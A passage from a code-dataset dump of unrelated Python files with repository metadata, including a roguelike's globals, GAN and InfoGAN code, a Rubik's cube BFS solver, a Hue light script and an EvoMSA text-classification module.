IsMisl = 2 ** 3\n IsMany = 2 ** 4\n\n IsFound = 2 ** 5\n\n IsBlock = 2 ** 6\n IsRegen = 2 ** 7\n IsMean = 2 ** 8\n IsGreed = 2 ** 9\n IsInvis = 2 ** 10\n\n# Various constants\nBearTime:int = 3\nSleepTime:int = 5\nHoldTime:int = 2\nWanderTime:int = 70\nHuhDuration:int = 20\nSeeDuration:int = 850\nHungerTime:int = 1300\nMoreTime:int = 150\nStomachSize:int = 2000\nBoltLength:int = 6\n\n\n\nrooms = []\nroomGraphDesc = []\nstartPosition = None\n\nstdscr = None\nplayerWindow = None\nhelpWindow = None\nmonsterWindow = None\n\n# initialParameter of magic items\nthings = None\npotionMagic = None\nscrollMagic = None\nringMagic = None\nstickMagic = None\nweapons = None\narmors = None\n\n# monster parameters\nmonsterParameters = []\n\n# things in level of dungeon\nlevelObjectList = [] # List of objects on this level\nlevelMonsterList = [] # List of monsters on the level\ntraps = []\n\n# playing status\nlevel = 1 # What level rogue is on\nntraps = 0 # Number of traps on this level\nnoMove = 0 # Number of turns held in place\nnoCommand = 0 # Number of turns asleep\ninpack = 0 # Number of things in pack\nlastscore = 0 # Score before this turn\nseed = 0 # Random number seed\ncount = 0 # Number of times to repeat command\ndnum = 0 # Dungeon number\nfungHit = 0 # Number of time fungi has hit\nmaxLevel = 25 # Deepest player has gone\ngroup = 0 # Current group number\n\n# Game status\nplayingGame = True # True until he quits\nafter = False # True if we want after daemons\nnotify = False # True if player wants to know\nfightFlush = False # True if toilet input\nslowInvent = False # Inventory one line at a time\naskMe = False # Ask about unidentified things\nhasAmulet = False\n\nhelpList = [\n ( '?', \" prints help\" ),\n ( '/', \" identify object\" ),\n ( 'h', \" left\" ),\n ( 'j', \" down\" ),\n ( 'k', \" up\" ),\n ( 'l', \" right\" ),\n ( 'y', \" up & left\" ),\n ( 'u', \" up & right\" ),\n ( 'b', \" down & left\" ),\n ( 'n', \" down & right\" ),\n ( 'H', \" run left\" ),\n ( 'J', \" run down\" ),\n ( 'K', \" run up\" ),\n ( 'L', \" run right\" ),\n ( 'Y', \" run up & left\" ),\n ( 'U', \" run up & right\" ),\n ( 'B', \" run down & left\" ),\n ( 'N', \" run down & right\" ),\n ( 't', \" throw something\" ),\n ( 'f', \" forward until find something\" ),\n ( 'p', \" zap a wand in a direction\" ),\n ( 'z', \" zap a wand or staff\" ),\n ( '>', \" go down a staircase\" ),\n ( 's', \" search for trap/secret door\" ),\n ( ' ', \" (space) rest for a while\" ),\n ( 'i', \" inventory\" ),\n ( 'I', \" inventory single item\" ),\n ( 'q', \" quaff potion\" ),\n ( 'r', \" read paper\" ),\n ( 'e', \" eat food\" ),\n ( 'w', \" wield a weapon\" ),\n ( 'W', \" wear armor\" ),\n ( 'T', \" take armor off\" ),\n ( 'P', \" put on ring\" ),\n ( 'R', \" remove ring\" ),\n ( 'd', \" drop object\" ),\n ( 'c', \" call object\" ),\n ( 'o', \" examine/set options\" ),\n ( \"^L\", \" redraw screen\" ),\n ( \"^R\", \" repeat last message\" ),\n ( \"^[\", \" cancel command\" ),\n ( 'v', \" print program version number\" ),\n ( '!', \" shell escape\" ),\n ( 'S', \" save game\" ),\n ( 'Q', \" quit\" ) \n]","repo_name":"Hajime-Saitou/pyrogue","sub_path":"Global.py","file_name":"Global.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16530427486","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# Use GPU or TPU\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Load your trained generator\nnetG = Generator().to(device)\nnetG.load_state_dict(torch.load('generatorV38.pth'))\nnetG.eval()\n\nfig = plt.figure(figsize=(20, 5))\n\n# Generate and visualize 4 samples with different latent vectors\nfor i in range(4):\n # Generate a random latent vector z with 200 dimensions\n z = torch.randn((1, 200, 1, 1, 1)).to(device)\n #z = torch.randn((1, 200)).to(device)\n\n\n # Generate a 3D voxel data using the generator\n with torch.no_grad():\n generated_data = netG(z).cpu().numpy()\n\n # Reshape the data and visualize it using a 3D plot\n generated_data = generated_data.reshape((64, 64, 64))\n\n ax = fig.add_subplot(1, 4, i+1, projection='3d')\n\n # Find the coordinates of the voxels with values above the threshold (e.g., 0.3)\n coords = np.array(np.nonzero(generated_data > 0.3)).T\n\n # Get the intensity values for each coordinate (used for color)\n intensity = generated_data[generated_data > 0.3]\n\n # Create a scatter plot using the coordinates, with color determined by intensity and a colormap\n ax.scatter(coords[:,0], coords[:,1], coords[:,2], c=intensity, cmap='viridis', marker='o', alpha=0.6)\n\n ax.set_title(f'Sample {i+1}')\n\nplt.show()\n","repo_name":"andros99/3-dimensional-generative-adversarial-network","sub_path":"GAN/showGan.py","file_name":"showGan.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12355412989","text":"from __future__ import print_function\nfrom utils.utils import z_noise, c_noise, make_trainable, ups_conv_bn\nfrom utils.visualization import plot_results_InfoGAN\nfrom keras.models import Model\nfrom keras.layers import *\nfrom keras.optimizers import Adam\nfrom keras.utils.np_utils import to_categorical\nfrom models.gan import GAN\nfrom tqdm import tqdm\n\nimport numpy as np\nimport tensorflow as tf\n\nclass InfoGAN(GAN):\n \"\"\" InfoGAN, as per https://arxiv.org/abs/1606.03657\n We base our GAN architecture on a DCGAN model\n \"\"\"\n\n def __init__(self, args):\n GAN.__init__(self)\n self.build_model()\n\n def build_model(self):\n # Input Tensors\n self.input_G = Input(shape=(self.noise_dim,)) # Noise Vector\n self.input_D = Input(shape=self.img_shape) # Image Tensor\n self.conditioning_label = Input(shape=(self.class_dim,)) # One-hot encoded latent code\n\n # Assemble InfoGAN Model using the functional API\n self.G = self.generator(self.input_G, self.conditioning_label)\n self.D = self.discriminator(self.input_D)\n self.Q = self.auxiliary(self.input_D)\n self.G_and_D = Model([self.input_G, self.conditioning_label], self.D(self.output_G)) # D attached to G\n self.G_and_Q = Model([self.input_G, self.conditioning_label], self.Q(self.output_G)) # Q attached to G\n\n # Compile models\n self.D.compile(Adam(10 * self.lr), \"binary_crossentropy\")\n self.G_and_D.compile(Adam(self.lr), \"binary_crossentropy\")\n self.G_and_Q.compile(Adam(self.lr), self.custom_objective_Q(self.input_G, self.conditioning_label))\n\n def train(self, X_train, nb_epoch=10, nb_iter=250, bs=128, y_train=None, save_path='../models/'):\n \"\"\" Train InfoGAN:\n - Train D to discriminate G results, conditioned on label\n - Train G to fool D, conditioned on label\n \"\"\"\n for e in range(nb_epoch):\n print(\"Epoch \" + str(e+1) + \"/\" + str(nb_epoch))\n for i in tqdm(range(nb_iter)):\n # Retrieve discriminator and auxiliary network training data\n X, y, random_z, random_c = self.mixed_data(bs//2, X_train, y_train, self.G)\n # Train discriminator\n self.D.train_on_batch(X,y)\n # Freeze discriminator\n make_trainable(self.D, False)\n make_trainable(self.Q, False)\n # Train generator i.e. whole model (G + frozen D)\n self.G_and_D.train_on_batch([z_noise(bs), c_noise(bs)], np.zeros([bs]))\n # Unfreeze discriminator\n make_trainable(self.D, True)\n make_trainable(self.Q, True)\n # Train Auxiliary Network\n self.G_and_Q.train_on_batch([random_z, random_c], np.zeros([bs//2]))\n self.G_and_Q.save_weights(save_path +'InfoGAN_Q' + str(e+1) + '.h5')\n self.G_and_D.save_weights(save_path +'InfoGAN_D' + str(e+1) + '.h5')\n\n def pre_train(self, X_train, y_train):\n \"\"\" Pre-train D for a couple of iterations\n \"\"\"\n print(\"Pre-training D for a couple of iterations...\", end='')\n sz = X_train.shape[0]//200\n # Concatenate real and fake images\n real_images = np.random.permutation(X_train)[:sz]\n fake_images = self.G.predict([z_noise(sz), c_noise(sz)])\n x1 = np.concatenate([real_images, fake_images])\n # Train D\n self.D.fit(x1, [0]*sz + [1]*sz, batch_size=128, nb_epoch=1, verbose=2)\n print(\"done.\")\n\n def mixed_data(self, sz, X_train, y_train, G):\n \"\"\" Generate fake and real data to train D and Q\n \"\"\"\n # Pre-compute random vectors\n permutations = np.random.randint(0,X_train.shape[0],size=sz)\n random_z = z_noise(sz) # Noise input\n random_c = c_noise(sz) # Latent code\n # Sample real images and fake images\n X = np.concatenate((X_train[permutations[:sz]], G.predict([random_z, random_c])))\n return X, [0]*sz + [1]*sz, random_z, random_c\n\n def generator(self, input_G, conditioning_label):\n \"\"\" InfoGAN Generator, small neural network with upsampling and ReLU\n \"\"\"\n # Feed conditioning input into a Dense unit\n x_noise = Dense(128, activation='relu')(input_G)\n x_label = Dense(128, activation='relu')(conditioning_label)\n\n # Concatenate the units and feed to the shared branch\n x = merge([x_noise, x_label], mode='concat')\n x = Dense(512*7*7, activation='relu')(x)\n x = BatchNormalization(mode=2)(x)\n x = Reshape((7, 7, 512))(x)\n # 2 x (UpSampling + Conv2D + BatchNorm) blocks\n x = ups_conv_bn(x, 64, 'relu')\n x = ups_conv_bn(x, 32, 'relu')\n self.output_G = Convolution2D(1, 1, 1, border_mode='same', activation='tanh')(x)\n # Assemble the model\n return Model([input_G, conditioning_label], self.output_G)\n\n def discriminator(self, input_D):\n \"\"\" InfoGAN Discriminator, small neural network with upsampling\n (nb: D is unconditional)\n \"\"\"\n # Create a shared core for D and Q\n x = Convolution2D(256, 5, 5, subsample=(2,2), border_mode='same', input_shape=(28,28,1), activation=LeakyReLU())(input_D)\n self.shared_D_Q = Convolution2D(512, 5, 5, subsample=(2,2), border_mode='same', activation=LeakyReLU())(x)\n x = Flatten()(self.shared_D_Q)\n x = Dense(256, activation=LeakyReLU())(x)\n output_D = Dense(1, activation = 'sigmoid')(x)\n # Assemble the model\n return Model(input_D, output_D)\n\n def auxiliary(self, input_D):\n \"\"\" Auxiliary network Q, to maximize mutual information in latent code\n \"\"\"\n x = Flatten()(self.shared_D_Q)\n x = Dense(256, activation='relu')(x)\n output_Q = Dense(10, activation = 'softmax')(x) # Nb: softmax to match c prior (categorical)\n # Assemble the model\n return Model(input_D, output_Q)\n\n def custom_objective_Q(self, z, c):\n \"\"\" Define proxy objective function, using nested loss function (unused args)\n \"\"\"\n def loss(y_true, y_pred):\n # Conditional entropy Q(c'|z)\n cond_entropy = tf.reduce_mean(-tf.reduce_sum(tf.log(self.G_and_Q([z,c]) + 1e-8) * c, 1))\n # Entropy of latent code H(c)\n lat_entropy = tf.reduce_mean(-tf.reduce_sum(tf.log(c + 1e-8) * c, 1))\n # Total Entropy\n total_entropy = tf.cast(cond_entropy, tf.float32) + tf.cast(lat_entropy, tf.float32)\n return total_entropy\n return loss\n\n def visualize(self):\n plot_results_InfoGAN(self.G, )\n\n def load_weights(self,path):\n self.G_and_D.load_weights(path)\n self.G_and_Q.load_weights(path.replace('_D', '_Q'))\n","repo_name":"germain-hug/GANs-Keras","sub_path":"models/infogan.py","file_name":"infogan.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"35288876110","text":"from test_interface1 import env_demo\n\n\nclass TestApi():\n data = {\n \"method\": \"get\",\n \"url\": \"http://abc:9999/demo.txt\",\n \"headers\": None\n }\n\n def test_send(self):\n api = env_demo.Api()\n print(api.send(self.data).text)","repo_name":"dj225625/PycharmProjects_2","sub_path":"test_interface1/test_send.py","file_name":"test_send.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34264126148","text":"#!/user/bin/env python\nimport time\nimport ConfigParser\nimport json\nimport requests\n\nfrom base64 import b64encode\n\n#Load Settings\nparser = ConfigParser.SafeConfigParser()\nparser.read('config.ini')\n\nLIP = parser.get('Login Parameters', 'LINK_IP')\nLPT = parser.get('Login Parameters', 'LINK_PROTOCOL')\n\nwith open('pulse_up.json') as data_file:\n pulse_up = json.load(data_file)\n\nwith open('pulse_mid.json') as data_file:\n pulse_mid =json.load(data_file)\n\nwith open('pulse_down.json') as data_file:\n pulse_down=json.load(data_file)\n\nwith open('token.json') as data_file:\n data = json.load(data_file)\n\nauthheaders = { 'Authorization' : 'Bearer %s' % data[\"session_token\"] }\nlinkurl = LPT + \"://\" + LIP + \":3000\"\n\nwith open('services.json') as data_file:\n services = json.load(data_file)\n\nwhile True:\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_up)\n time.sleep (0.1)\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_mid)\n time.sleep(0.1)\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_down)\n time.sleep(0.1)\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_mid)\n","repo_name":"nhirata/hue_scripts","sub_path":"pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40533857094","text":"import unittest\nfrom math import pi\n\ndef circle_area(r):\n if r < 0:\n raise ValueError(\"radius is less than zero\")\n \n if type(r) not in [int, float]:\n raise TypeError(\"radius is not a number\")\n # calculates the area of a circle\n return pi*(r**2)\n\n# print(circle_area(0))","repo_name":"Godswilleo/unittest","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31759851661","text":"import rubik\n \n# Let each operator being dict[(perm_seq)]=([op_seq])\n\ndef convertStrStoreToAnswerList(store):\n return [eval('rubik.'+op) for op in store]\n\ndef shortest_path(start, end):\n \"\"\"\n Using 2-way BFS, finds the shortest path from start_position to\n end_position. Returns a list of moves. \n\n You can use the rubik.quarter_twists move set.\n Each move can be applied using rubik.perm_apply\n \"\"\"\n if(start==end): return []\n start_set={start:[]}\n end_set={end:[]}\n for i in range(7):\n new_start_set={}\n new_end_set={}\n# do new step\n for pos in start_set:\n last_op_seq=start_set[pos]\n for perm in rubik.quarter_twists:\n new_pos=rubik.perm_apply(perm,pos)\n if(new_start_set.get(new_pos) == None):\n new_start_set[new_pos]=last_op_seq+[rubik.quarter_twists_names[perm]]\n# check key\n for pos in end_set.keys():\n if(new_start_set.get(pos)!=None):\n first_part_answer=convertStrStoreToAnswerList(new_start_set[pos])\n second_part_answer=convertStrStoreToAnswerList(end_set[pos])\n second_part_answer.reverse()\n second_part_answer=[rubik.perm_inverse(p) for p in second_part_answer]\n return first_part_answer+second_part_answer\n# do new step\n for pos in end_set:\n last_op_seq=end_set[pos]\n for perm in rubik.quarter_twists:\n new_pos=rubik.perm_apply(perm,pos)\n if(new_end_set.get(new_pos)==None):\n new_end_set[new_pos]=last_op_seq+[rubik.quarter_twists_names[perm]]\n start_set=new_start_set\n for pos in start_set.keys():\n if(new_end_set.get(pos)!=None):\n first_part_answer=convertStrStoreToAnswerList(new_start_set[pos])\n second_part_answer=convertStrStoreToAnswerList(new_end_set[pos])\n second_part_answer.reverse()\n second_part_answer=[rubik.perm_inverse(p) for p in second_part_answer]\n return first_part_answer+second_part_answer\n end_set=new_end_set\n return None\n#\n#k=rubik.I\n#k=rubik.perm_apply(rubik.F,k)\n#reverse_F=rubik.perm_inverse(rubik.F)\n#k=rubik.perm_apply(reverse_F,k)\n#print(k)","repo_name":"algoflow19/Algorithm","sub_path":"6006/A6/ps6/rubik/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13391708520","text":"n, count = int(input()), 0\nfor i in range(n):\n word = input()\n lst = set()\n Zword = word[0]\n tf = 1\n for Nword in word:\n if Nword != Zword:\n if Nword in lst:\n tf = 0\n break\n lst.add(Zword)\n Zword = Nword\n count += tf\nprint(count)","repo_name":"haggy06/baekjoon-python","sub_path":"level_6/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27330274390","text":"from typing import Union\nfrom microtc.utils import save_model, tweet_iterator, SparseMatrix\nfrom b4msa.textmodel import TextModel\nfrom EvoMSA.ConceptModelling.thumbs_up_down import ThumbsUpDown, _ARABIC, _ENGLISH, _SPANISH, PATH as ConPATH\nfrom scipy.stats import multivariate_normal\nfrom scipy.special import logsumexp\nfrom sklearn.svm import LinearSVC\nimport numpy as np\nimport os\n\n\nclass BaseTextModel(object):\n \"\"\"Base class for text model\n\n :param corpus: Text to build the text model\n :type corpus: list or dict\n \"\"\"\n\n def __init__(self, corpus=None, **kwargs):\n pass\n\n def fit(self, X):\n \"\"\"\n Train the model\n\n :param X: Corpus\n :type X: list\n :rtype: instance\n \"\"\"\n\n pass\n\n def __getitem__(self, x):\n pass\n\n def tokenize(self, text):\n pass\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass BaseClassifier(object):\n \"\"\"Base class for the classifier\"\"\"\n\n def __init__(self, random_state=0):\n pass\n\n def fit(self, X, y):\n\n \"\"\"Method to train the classifier\n :param X: Independent variable\n :type X: np.array or csc_matrix\n :param y: Dependent variable\n :type y: np.array\n :rtype: self\n \"\"\"\n\n return self\n\n def decision_function(self, X):\n \"\"\"Classifier's decision function\n\n :param X: Independent variable\n :type X: np.array or csc_matrix\n :rtype: np.array\n \"\"\"\n\n pass\n\n\nclass OutputClassifier(object):\n \"\"\"LinearSVC that outputs the training set and test set using the environment varible OUTPUT\"\"\"\n\n def __init__(self, random_state=0, output=None):\n self._output = os.getenv('OUTPUT', output)\n assert self._output is not None\n self._random_state = random_state\n\n def fit(self, X, y):\n self.m = LinearSVC(random_state=self._random_state).fit(X, y)\n try:\n X = np.array(X.todense())\n except AttributeError:\n pass\n with open('%s_train.csv' % self._output, 'w') as fpt:\n for x, _y in zip(X, y):\n fpt.write(\",\".join([str(_) for _ in x]))\n fpt.write(\",%s\\n\" % str(_y))\n return self\n\n def decision_function(self, X):\n hy = self.m.decision_function(X)\n try:\n X = np.array(X.todense())\n except AttributeError:\n pass\n with open('%s_test.csv' % self._output, 'w') as fpt:\n for x in X:\n fpt.write(\",\".join([str(_) for _ in x]))\n fpt.write(\"\\n\")\n return hy\n\n\nclass EvoMSAWrapper(BaseTextModel):\n def __init__(self, evomsa=None):\n assert evomsa is not None\n evomsa.n_jobs = 1\n self._evomsa = evomsa\n\n def transform(self, X):\n return self._evomsa.predict_proba(X)\n\n\nclass SVCWrapper(object):\n \"\"\"Wrapper to the LinearSVC class\n >>> from EvoMSA.model import SVCWrapper\n >>> s = SVCWrapper()\n >>> s.dual\n False\n \"\"\"\n def __init__(self, *args, dual=False, **kwargs):\n self._m = LinearSVC(*args, dual=dual, **kwargs)\n\n def fit(self, X, y):\n return self._m.fit(X, y)\n\n def predict(self, X):\n return self._m.predict(X)\n\n def decision_function(self, X):\n return self._m.decision_function(X)\n\nclass Identity(BaseTextModel, BaseClassifier):\n \"\"\"Identity function used as either text model or classifier or regressor\"\"\"\n\n def __getitem__(self, x):\n return x\n\n def fit(self, X, y=None):\n return self\n\n def decision_function(self, X):\n try:\n return X.toarray()\n except AttributeError:\n return X\n\n def predict_proba(self, X):\n return self.decision_function(X)\n\n\nclass LabeledDataSet(BaseTextModel, BaseClassifier):\n \"\"\"Create a text classifier using b4msa.textmodel.TextModel and LinearSVC\n\n :param docs: do not use\n :type docs: None\n :param textModel: text model e.g., b4msa.textmodel.TextModel\n :param coef: coefficients obtained from LinearSVC\n :type coef: array\n :param intercept: bias obtained from LinearSVC\n :type intercept: array\n :param labels: list of labels or classes\n :type labels: list\n \"\"\"\n def __init__(self, docs=None, textModel=None, coef=None, intercept=None, labels=None):\n assert docs is None\n self._textModel = textModel\n self._coef = coef\n self._intercept = intercept\n self._labels = labels\n self._text = os.getenv('TEXT', default='text')\n\n @property\n def textModel(self):\n from .cython_utils import TextModelPredict\n try:\n return self._textModelPredict\n except AttributeError:\n self._textModelPredict = TextModelPredict(self._textModel,\n self._coef,\n self._intercept)\n return self._textModelPredict\n\n def __getstate__(self):\n \"\"\"Remove attributes before the pickle\"\"\"\n\n r = self.__dict__.copy()\n try:\n del r['_textModelPredict']\n except KeyError:\n pass\n return r\n\n def fit(self, X, y=None):\n return self\n\n def get_text(self, text):\n key = self._text\n if isinstance(text, (list, tuple)):\n return \" | \".join([x[key] for x in text])\n elif isinstance(text, str):\n return text\n return text[key]\n\n def decision_function(self, X):\n return self.transform(X)\n\n def predict_proba(self, X):\n return self.decision_function(X)\n\n def transform(self, X):\n output = []\n self.textModel.transform([self.get_text(x) for x in X], output)\n return np.array(output)\n\n def __getitem__(self, x):\n return np.array(self.textModel[self.get_text(x)])\n\n @classmethod\n def _create_space(cls, fname, **kwargs):\n \"\"\"Create the space from a file of json\n\n :param fname: Path to the file containing the json\n :type fname: str\n :param kwargs: Keywords pass to TextModel\n \"\"\"\n import random\n from .utils import linearSVC_array\n from collections import Counter\n try:\n from tqdm import tqdm\n except ImportError:\n def tqdm(x, **kwargs):\n return x\n\n data = [x for x in tweet_iterator(fname)]\n random.shuffle(data)\n tm = TextModel(**kwargs).fit([x['text'] for x in data[:128000]])\n tm._num_terms = tm.model.num_terms\n # klass, nele = np.unique([x['klass'] for x in data], return_counts=True)\n _ = [(k, v) for k, v in Counter([x['klass'] for x in data]).items()]\n _.sort(key=lambda x: x[0])\n klass = [x[0] for x in _]\n nele = [x[1] for x in _]\n h = {v: k for k, v in enumerate(klass)}\n MODELS = []\n for ident, k in tqdm(enumerate(klass)):\n elepklass = [0 for __ in klass]\n cnt = nele[ident]\n cntpklass = int(cnt / (len(klass) - 1))\n D = [(x, 1) for x in data if x['klass'] == k]\n for x in data:\n if x['klass'] == k:\n continue\n if elepklass[h[x['klass']]] > cntpklass:\n continue\n elepklass[h[x['klass']]] = elepklass[h[x['klass']]] + 1\n D.append((x, -1))\n m = LinearSVC().fit(tm.tonp([tm[x[0]['text']] for x in D]), [x[1] for x in D])\n MODELS.append(m)\n coef, intercept = linearSVC_array(MODELS)\n return tm, coef, intercept, klass\n\n @classmethod\n def create_space(cls, fname, output=None, **kwargs):\n \"\"\"Create the space from a file of json\n\n :param fname: Path to the file containing the json\n :type fname: str\n :param output: Path to store the model, it is cls.model_fname if None\n :type output: str\n :param kwargs: Keywords pass to TextModel\n \"\"\"\n tm, coef, intercept, klass = cls._create_space(fname, **kwargs)\n if output is None:\n output = cls.model_fname()\n ins = cls(textModel=tm, coef=coef, intercept=intercept, labels=klass)\n save_model(ins, output)\n\n\nclass Corpus(BaseTextModel, SparseMatrix):\n \"\"\"Text model using only words\"\"\"\n\n def __init__(self, corpus=None, **kwargs):\n self._text = os.getenv('TEXT', default='text')\n self._m = {}\n self._num_terms = 0\n self._training = True\n self._textModel = TextModel(token_list=[-1])\n if corpus is not None:\n self.fit(corpus)\n\n def get_text(self, text):\n return text[self._text]\n\n def fit(self, c):\n [self.__getitem__(x) for x in c]\n self._training = False\n return self\n\n @property\n def num_terms(self):\n return self._num_terms\n\n def tokenize(self, text):\n if isinstance(text, dict):\n text = self.get_text(text)\n if isinstance(text, (list, tuple)):\n tokens = []\n for _text in text:\n tokens.extend(self._textModel.tokenize(_text))\n return tokens\n else:\n return self._textModel.tokenize(text)\n\n def transform(self, texts):\n \"\"\"Convert test into a vector\n\n :param texts: List of text to be transformed\n :type text: list\n\n :rtype: list\n\n Example:\n\n >>> from microtc.textmodel import TextModel\n >>> corpus = ['buenos dias catedras', 'catedras conacyt']\n >>> textmodel = TextModel().fit(corpus)\n >>> X = textmodel.transform(corpus)\n \"\"\"\n return self.tonp([self.__getitem__(x) for x in texts])\n\n def __getitem__(self, d):\n tokens = []\n for t in self.tokenize(d):\n try:\n index, k = self._m[t]\n if self._training:\n self._m[t] = [index, k+1]\n except KeyError:\n if not self._training:\n continue\n index, k = self._num_terms, 1\n self._m[t] = [index, k]\n self._num_terms += 1\n tokens.append([index, k])\n return tokens\n\n\nclass AggressivenessAr(Corpus):\n \"\"\"Arabic text model using an aggressive corpus\"\"\"\n\n def __init__(self, *args, **kwargs):\n fname = os.path.join(os.path.dirname(__file__), 'conf',\n 'aggressiveness.ar')\n corpus = []\n for x in tweet_iterator(fname):\n corpus += x['words']\n super(AggressivenessAr, self).__init__(corpus)\n\n\nclass AggressivenessEn(Corpus):\n \"\"\"English text model using an aggressive corpus\"\"\"\n\n def __init__(self, *args, **kwargs):\n fname = os.path.join(os.path.dirname(__file__), 'conf',\n 'aggressiveness.en')\n corpus = []\n for x in tweet_iterator(fname):\n corpus += x['words']\n super(AggressivenessEn, self).__init__(corpus)\n\n\nclass AggressivenessEs(Corpus):\n \"\"\"Spanish text model using an aggressive corpus\"\"\"\n\n def __init__(self, *args, **kwargs):\n fname = os.path.join(os.path.dirname(__file__), 'conf',\n 'aggressiveness.es')\n corpus = []\n for x in tweet_iterator(fname):\n corpus += x['words']\n super(AggressivenessEs, self).__init__(corpus)\n\n\nclass Bernoulli(BaseClassifier):\n \"\"\"Bernoulli classifier\"\"\"\n\n def __init__(self, random_state=0):\n self._num_terms = -1\n\n @property\n def num_terms(self):\n return self._num_terms\n\n def fit(self, X, klass):\n self._num_terms = X.shape[1]\n klasses, prior = np.unique(klass, return_counts=True)\n self._prior = np.log(prior / prior.sum())\n pr = np.zeros((klasses.shape[0], self.num_terms))\n for i, k in zip(X, klass):\n index = i.indices\n if index.shape[0] > 0:\n pr[k, index] += 1\n pr = np.array([(x + 1) / ((klass == i).sum() + 2)\n for x, i in zip(pr, klasses)])\n self._wj = np.log(pr)\n self._vj = np.log(1 - pr)\n return self\n\n def predict(self, X):\n return np.argmax(self.decision_function_raw(X), axis=1)\n\n def decision_function(self, X):\n _ = self.predict_proba(X)\n df = _ * 2 - 1\n df[df > 1] = 1\n df[df < -1] = -1\n return df\n\n def predict_proba(self, X):\n X = self.decision_function_raw(X)\n return np.exp(X)\n\n def decision_function_raw(self, X):\n wj = self._wj\n vj = self._vj\n hy = []\n prior = self._prior\n x = np.zeros(self.num_terms)\n for d in X:\n x.fill(0)\n index = d.indices\n if index.shape[0] > 0:\n x[index] = 1\n _ = ((x * wj) + (1 - x) * vj).sum(axis=1) + prior\n hy.append(_)\n hy = np.array(hy)\n hy = hy - np.atleast_2d(logsumexp(hy, axis=1)).T\n return hy\n\n\nclass Multinomial(Bernoulli):\n \"\"\"Multinomial classifier\"\"\"\n\n def fit(self, X, klass):\n self._num_terms = X.shape[1]\n klasses = np.unique(klass)\n pr = np.zeros((klasses.shape[0], self.num_terms))\n for i, k in zip(X, klass):\n index = i.indices\n if index.shape[0] > 0:\n pr[k, index] += 1\n den = pr.sum(axis=1)\n self._log_xj = np.log((1 + pr) / np.atleast_2d(self.num_terms + den).T)\n return self\n\n def decision_function_raw(self, X):\n xj = self._log_xj\n hy = []\n for d in X:\n x = np.zeros(self.num_terms)\n index = d.indices\n if index.shape[0] > 0:\n x[index] = 1\n _ = (xj * x).sum(axis=1)\n hy.append(_)\n return np.array(hy)\n\n\nclass ThumbsUpDownEs(ThumbsUpDown):\n \"\"\"Spanish thumbs up and down model\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ThumbsUpDownEs, self).__init__(lang=_SPANISH, stemming=False)\n\n def fit(self, X):\n return self\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass ThumbsUpDownEn(ThumbsUpDown):\n \"\"\"English thumbs up and down model\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ThumbsUpDownEn, self).__init__(lang=_ENGLISH, stemming=False)\n\n def fit(self, X):\n return self\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass ThumbsUpDownAr(ThumbsUpDown):\n \"\"\"Arabic thumbs up and down model\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ThumbsUpDownAr, self).__init__(lang=_ARABIC, stemming=False)\n\n def fit(self, X):\n return self\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass Vec(BaseTextModel):\n \"\"\"Read the key vec, useful to incorporate external knowledge as FastText print-sentence-vectors\"\"\"\n\n def __getitem__(self, x):\n return x['vec']\n\n def fit(self, X):\n return self\n\n\nclass TextModelInv(TextModel):\n \"\"\"Extends :mod:`b4msa.textmodel.TextModel` in order to override tokenize method.\"\"\"\n \n def __init__(self, is_by_character: bool=True, **kwargs):\n \"\"\"\n :param is_by_character: if true, inverts the text character by character; if false, inverts word by word \n :type is_by_character: bool\n \"\"\"\n \n super(TextModelInv, self).__init__(**kwargs)\n self.is_by_character = is_by_character\n \n def tokenize(self, text: Union[str, dict]):\n \"\"\"Inverts text\n\n :param text: Text\n :type text: str\n \"\"\"\n if isinstance(text, dict):\n text = self.get_text(text)\n\n if self.is_by_character:\n result = text[::-1]\n else:\n result = text.split(' ')\n result.reverse()\n result = \" \".join(result) \n \n return super(TextModelInv, self).tokenize(result)\n\n\nclass GaussianBayes(object):\n \"\"\"\n >>> from scipy.stats import multivariate_normal\n >>> from EvoMSA.model import GaussianBayes \n >>> X_1 = multivariate_normal(mean=[5, 5], cov=[[4, 0], [0, 2]]).rvs(size=1000)\n >>> X_2 = multivariate_normal(mean=[1.5, -1.5], cov=[[2, 1], [1, 3]]).rvs(size=1000)\n >>> X_3 = multivariate_normal(mean=[12.5, -3.5], cov=[[2, 3], [3, 7]]).rvs(size=1000)\n >>> X = np.concatenate((X_1, X_2, X_3))\n >>> y = np.array([1] * 1000 + 